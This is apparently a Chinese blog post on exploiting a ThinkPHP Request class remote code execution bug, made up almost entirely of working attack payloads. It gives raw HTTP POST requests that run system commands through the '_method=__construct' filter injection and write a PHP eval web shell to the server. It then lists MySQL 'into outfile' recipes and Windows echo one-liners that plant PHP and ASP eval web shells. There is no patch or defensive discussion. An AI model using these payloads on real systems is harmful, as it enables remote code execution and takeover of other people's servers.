此次漏洞出现在ThinkPHP用于处理HTTP请求的Request类中,其中的method方法用于获取当前的请求类型。
thinkphp/library/think/Request.php
先提交数据 得到目录路径
POST /index.php HTTP/1.1
Host: faka.test
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
_method=__construct&method=get&filter[]=system&get[]=dir
然后在写入shell
POST /index.php HTTP/1.1
Host: faka.test
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
_method=__construct&method=get&filter[]=system&get[]=echo ^<^?php @eval($_POST[‘abc’]);?^>^ >D:\phpstudy_pro\WWW\faka\public\ant.php
剩下蚁剑搞定。。。
mysql命令导出shell
create TABLE study (cmd text Not NULL);
insert INTO study (cmd) VALUES(‘<?php eval($_POST[cmd])?>’);
select cmd from study into outfile ‘D:/php/www/htdocs/test/seven.php’;
drop TABLE IF EXISTS study;
select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘c:/inetpub/wwwroot/mysql.php/1.php’
create TABLE study (cmd BLOB Not NULL);
insert INTO study (cmd) VALUES(‘<?php eval($_POST[cmd])?>’);
select cmd from study into outfile ‘D:/php/www/htdocs/test/seven.php’;
drop TABLE IF EXISTS study;
命令执行拿shell
echo ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.php
echo ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.php
^<^%eval request(“abc”)%^>^ >c:\1.php
扩展:
https://sunjian.blog.csdn.net/article/details/113789521
https://blog.csdn.net/wuxianbing2012/article/details/104897634
工具
BurpSuite v2.1
(文章今日已有 1 人访问,总访问量 14 ::>_<::)